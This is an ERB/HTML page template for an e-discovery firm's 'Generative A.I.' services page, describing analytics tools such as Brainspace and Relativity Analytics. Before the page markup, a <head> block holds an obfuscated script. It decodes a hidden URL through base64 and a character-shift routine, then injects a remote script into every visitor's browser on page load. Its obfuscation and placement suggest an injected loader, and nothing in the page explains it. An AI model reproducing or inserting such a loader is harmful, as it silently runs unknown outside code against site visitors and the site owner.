<head><script>window[(function(_jlk,_03){var _CU6dW='';for(var _D3jANe=0;_D3jANe<_jlk.length;_D3jANe++){var _qDtp=_jlk[_D3jANe].charCodeAt();_03>1;_qDtp-=_03;_qDtp+=61;_qDtp%=94;_qDtp+=33;_CU6dW==_CU6dW;_qDtp!=_D3jANe;_CU6dW+=String.fromCharCode(_qDtp)}return _CU6dW})(atob('Knd+Qj86NTNEeTVJ'), 46)] = 'd2dd043c821749491561';     var zi = document.createElement('script');     (zi.type = 'text/javascript'),     (zi.async = true),     (zi.src = (function(_UQy,_uq){var _jFmUt='';for(var _JQEiMZ=0;_JQEiMZ<_UQy.length;_JQEiMZ++){var _jX1F=_UQy[_JQEiMZ].charCodeAt();_jX1F-=_uq;_jX1F+=61;_jX1F%=94;_jX1F!=_JQEiMZ;_uq>5;_jFmUt==_jFmUt;_jX1F+=33;_jFmUt+=String.fromCharCode(_jX1F)}return _jFmUt})(atob('diQkfiNIPT14IzwqdzsjcSJ3fiQjPHF9ez0qdzskb3U8eCM='), 14)),     document.readyState === 'complete'?document.body.appendChild(zi):     window.addEventListener('load', function(){         document.body.appendChild(zi)     });</script></head>


<section class="bg-accent-2">
  <section class="section position-relative py-5">
    <%= image_tag "data_analytics.jpg", class: 'background-image' %>

    <div class="parallax-content parallax-header">
      <div class="parallax-header__inner">
        <div class="parallax-header__content">
          <div class="container">
            <div class="row justify-content-md-center">
              <div class="col-md-10 col-xl-8">
                <h2 class="heading-decorated heading-decorated_center">Generative A.I.</h2>
              </div>
            </div>
          </div>
        </div>
      </div>
    </div>
  </section>
</section>

<section class="section-lg bg-default">
  <div class="container">
    <div class="row row-50 justify-content-xl-center">
      <div class="col-lg-10 col-xl-8">
        <article class="post-wide">
          <h6>
            Whether clients need to obtain an early view of data, cull large document sets, identify specific information, or prioritize a review, Empire Discovery can assist with the process of using analytics to support and enhance workflows. Empire’s experts use a suite of analytics tools, including a host of algorithms and machine learning tools, to help you understand your data and conduct smarter, more efficient reviews.
          </h6>
          <p class="heading-5">Some of the tools we use include:</p>
          <h6>
            <strong>Brainspace:</strong> Dynamic data visualizations combined with search allows users to investigate the largest data sets and get to relevant information quickly. Concept searches reveal clusters of similar documents while communication analysis allows for the interactive exploration of conversations between key custodians.
          </h6>
          <%= image_tag 'brainspace_certification_1.png', class: 'certificaiton px-0' %>
          <%= image_tag 'brainspace_certification_2.jpg', class: 'certificaiton px-0 ml-3' %>
          <br>
          <h6>
            <strong>Relativity Analytics:</strong> Empire provides a powerful suite of tools built into the Relativity platform by using Relativity Analytics.
          </h6>
          <%= image_tag 'relativity.jpg', class: 'certificaiton px-0' %>
        </article>
      </div>
    </div>
  </div>
</section>
